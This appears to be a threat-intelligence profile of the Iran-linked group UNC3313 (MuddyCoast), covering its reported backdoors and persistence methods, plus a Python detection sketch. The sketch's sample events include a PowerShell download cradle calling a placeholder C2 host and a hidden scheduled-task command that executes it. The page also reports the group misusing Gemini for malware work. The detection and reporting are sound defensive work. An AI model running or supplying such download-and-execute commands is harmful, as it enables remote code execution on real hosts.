MuddyCoast
UNC3313, also referred to as MuddyCoast, is an Iran-nexus threat group. Available reporting describes it as conducting surveillance and strategic information-gathering operations via spear-phishing campaigns, and as an Iranian group active against Israel and the Middle East. One cited report states that UNC3313 is affiliated with MuddyWater. Reported activity includes distribution of the JELLYBEAN dropper and the CANDYBOX backdoor using phishing lures and file-sharing services, and use of up to nine legitimate remote monitoring and management (RMM) tools to evade detection and maintain access.

Mandiant also attributed multiple backdoors to UNC3313, including STARWHALE, STARWHALE.GO, and GRAMDOOR. STARWHALE is a VBScript/WSF backdoor that establishes persistence by creating a Windows service, performs host enumeration, communicates with a hardcoded C2 over HTTP POST using custom encoding, and executes commands via cmd.exe. STARWHALE.GO is a Golang variant delivered via certutil and an NSIS installer; it persists via a Run key, exchanges JSON over HTTP POST with a hardcoded C2, and executes received commands either via cmd.exe or directly, depending on file extension. GRAMDOOR is a Python 3.9 / PyInstaller backdoor delivered via an NSIS installer; it persists via a Windows Run key, executes only on Windows 8 and higher, and uses the Telegram Bot API for command and control.

Additional observed tradecraft includes storing PowerShell downloader commands in Registry keys referenced by a scheduled task, and downloading and installing the legitimate eHorus remote access tool as a Windows service for remote access. Google also reported that the Iranian group MuddyCoast (UNC3313) used Gemini for malware development and debugging, accidentally exposing C2 domains and keys in the process. Known aliases in the available reporting are MuddyCoast and UNC3313.
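The Registry-plus-scheduled-task pattern and the Run-key persistence described above are both visible from host telemetry. The detection sketch below is an added example written for this page; it is not code from Mandiant, Google or Mallory. It assumes a simplified event shape (dict fields `type`, `key`, `value`, `data`, `name`, `command`, an assumption rather than any product's schema), and the sample events, task name and the `c2.example.invalid` host are constructed for illustration. The logic correlates a Registry value that holds PowerShell download-cradle text with a scheduled task whose action reads that same key, which is the combination the reporting describes, and flags writes to Run keys separately.

```python
"""Detection sketch (added example, not vendor code) for two persistence
patterns in the UNC3313 summary: PowerShell downloader commands kept in a
Registry value that a scheduled task reads and executes, and Run-key
persistence. Events are constructed samples; the dict field names are an
assumption, not any product's schema."""
import re
from dataclasses import dataclass

# Run / RunOnce autostart keys under HKCU or HKLM (key path without the value name).
RUN_KEY_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?(?:\\|$)", re.I)
# Common PowerShell download-cradle markers that are suspicious inside Registry data.
DOWNLOAD_CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Invoke-RestMethod|-EncodedCommand", re.I)
# Ways a task action can pull a value back out of the Registry.
REG_READ_RE = re.compile(r"Get-ItemProperty|\bgp\b|reg(?:\.exe)?\s+query|RegRead", re.I)
# Registry paths as they appear in commands, e.g. HKCU:\Software\X or HKLM\Software\X.
REG_PATH_RE = re.compile(r"HK(?:CU|LM|U|CR|EY_[A-Z_]+):?(?:\\[^\\\s'\")]+)+", re.I)


@dataclass
class Finding:
    severity: str
    rule: str
    detail: str


def normalize_key(path: str) -> str:
    """Canonicalize a Registry key path so event and command spellings compare equal."""
    p = path.strip().rstrip("\\")
    p = re.sub(r"^HKEY_CURRENT_USER", "HKCU", p, flags=re.I)
    p = re.sub(r"^HKEY_LOCAL_MACHINE", "HKLM", p, flags=re.I)
    p = re.sub(r"^(HK[A-Z]+):", r"\1", p, flags=re.I)  # drop the PowerShell drive colon
    return p.lower()


def analyze(events: list[dict]) -> list[Finding]:
    """Two passes: collect suspicious Registry writes, then correlate tasks against them."""
    findings: list[Finding] = []
    cradle_keys: dict[str, str] = {}  # normalized key path -> data holding a download cradle

    # Pass 1: Registry writes. Flag autostart keys and downloader text stored as data.
    for e in events:
        if e["type"] != "registry_set":
            continue
        key = normalize_key(e["key"])
        if DOWNLOAD_CRADLE_RE.search(e["data"]):
            cradle_keys[key] = e["data"]
            findings.append(Finding("medium", "downloader_in_registry",
                                    f"{e['key']}\\{e['value']}"))
        if RUN_KEY_RE.search(e["key"]):
            findings.append(Finding("medium", "run_key_persistence",
                                    f"{e['key']}\\{e['value']} = {e['data']}"))

    # Pass 2: scheduled tasks whose action reads a key that pass 1 flagged.
    for e in events:
        if e["type"] != "task_created" or not REG_READ_RE.search(e["command"]):
            continue
        for m in REG_PATH_RE.finditer(e["command"]):
            if normalize_key(m.group(0)) in cradle_keys:
                findings.append(Finding("high", "task_executes_registry_downloader",
                                        f"task {e['name']} reads {m.group(0)}"))
    return findings


# Constructed sample telemetry: one benign Registry write, one benign task,
# one Run-key write, and a downloader stored in a value that a task reads back.
SAMPLE_EVENTS = [
    {"type": "registry_set", "key": r"HKCU\Software\Constructed\Cfg", "value": "payload",
     "data": "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"},
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"C:\Users\u\AppData\Roaming\updater.exe"},
    {"type": "registry_set", "key": r"HKLM\Software\Vendor\App", "value": "Version",
     "data": "1.2.3"},
    {"type": "task_created", "name": "SysHealthCheck",
     "command": r'''powershell.exe -w hidden -c "IEX (Get-ItemProperty 'HKCU:\Software\Constructed\Cfg').payload"'''},
    {"type": "task_created", "name": "Backup", "command": r"C:\Tools\backup.exe --nightly"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.detail}")
```

The first two rules fire on their own and are noisy in isolation (installers write Run keys, and admins store scripts in the Registry), which is why the high-severity finding requires the correlation: a task action that reads a key already known to contain download-cradle text. In production the same logic would run over Sysmon registry-set and task-creation events rather than the constructed dicts used here.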
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Where they're from
Attributed origin per open-source reporting.
- IR
Tradecraft
29 distinct MITRE ATT&CK techniques observed across reporting, grouped by tactic.
Associated malware families
5 malware families attributed to this actor across reporting.
Recent activity
3 sources tracked across advisories, community write-ups, and news.
Used Gemini to support malware development and debugging; operational security mistakes reportedly exposed C2 domains and keys.
UNC3313 is an Iranian threat group conducting surveillance and information-gathering via spear-phishing, using droppers, backdoors, and legitimate RMM tools.